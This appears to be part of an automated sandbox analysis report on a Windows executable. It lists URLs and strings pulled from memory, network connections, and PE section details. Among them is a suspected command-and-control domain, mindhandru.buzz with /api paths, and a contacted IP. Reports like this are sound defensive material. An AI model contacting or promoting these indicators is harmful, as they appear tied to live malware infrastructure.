Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_78.6.dr	String found in binary or memory: http://schema.org/Organization
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_78.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_78.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_78.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_78.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411535365.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411535365.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411535365.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_78.6.dr	String found in binary or memory: https://github.com/nschonni
Source: chromecache_78.6.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: rwFNJ4pHWG.exe, 00000000.00000003.1665949053.0000000001287000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1665902655.000000000127D000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1530418764.000000000128C000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/$
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438729714.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1438825960.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz//KqK
Source: rwFNJ4pHWG.exe, 00000000.00000003.1488527946.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490654370.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489640265.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489290466.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489828447.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489114394.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488662686.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490108199.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488631994.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1491188125.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488564484.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489465964.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490425816.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/1j8
Source: rwFNJ4pHWG.exe, 00000000.00000003.1488527946.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490654370.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489640265.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462684340.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489290466.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489828447.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489114394.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488662686.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490108199.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488631994.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1491188125.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488564484.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489465964.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1464080388.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462409131.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490425816.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/M8
Source: rwFNJ4pHWG.exe, 00000000.00000003.1491004572.000000000126E000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1438729714.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1531143876.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1438825960.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462684340.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1464080388.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462409131.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: rwFNJ4pHWG.exe, 00000000.00000003.1462684340.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1464080388.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462409131.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api$
Source: rwFNJ4pHWG.exe, 00000000.00000003.1491004572.000000000126E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apiAVOh
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438729714.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1438825960.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/apib
Source: rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/cAEyLoeGMXY4h2NuERROx;
Source: rwFNJ4pHWG.exe, 00000000.00000003.1516391330.000000000128C000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1530418764.000000000128C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/pi
Source: rwFNJ4pHWG.exe, 00000000.00000003.1530418764.000000000128C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_112.6.dr	String found in binary or memory: https://schema.org
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_112.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_92.6.dr, chromecache_112.6.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49762 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: rwFNJ4pHWG.exe	Static PE information: section name:
Source: rwFNJ4pHWG.exe	Static PE information: section name: .rsrc
Source: rwFNJ4pHWG.exe	Static PE information: section name: .idata

Source: rwFNJ4pHWG.exe, 00000000.00000003.1617532287.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619266178.0000000005BB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1629812887.0000000005F58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624866035.0000000006036000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000002.1736421672.00000000064D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619143500.0000000005FF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1632946288.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1626335613.000000000613F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623715334.0000000006026000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1628385442.0000000005F5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1627175701.0000000006059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1632751458.0000000006094000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1654926845.0000000005B75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624559671.000000000604C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624203300.0000000006030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1626515920.0000000005F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1634683706.0000000005F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000002.1735629479.0000000006223000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623376775.0000000006035000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620856393.0000000005F59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620977846.000000000600E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1631653464.0000000006079000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623495421.0000000006112000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1625170068.0000000005F65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1632551364.0000000005F58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1630013463.000000000606D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1630191408.000000000618A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1633517220.0000000005F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1625762979.0000000006048000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1654981615.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620078964.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1625350363.0000000006051000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1626150816.000000000604D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619391130.0000000005F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1620541346.0000000005FF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1617650465.0000000005BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1633153911.0000000005F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1624458692.0000000005F65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1627658637.0000000006061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1631414526.0000000005F56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1619628999.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1622591171.0000000005F5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1629507873.0000000006182000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1622883664.00000000060DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1623842973.0000000005F59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1622427239.0000000006021000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs rwFNJ4pHWG.exe
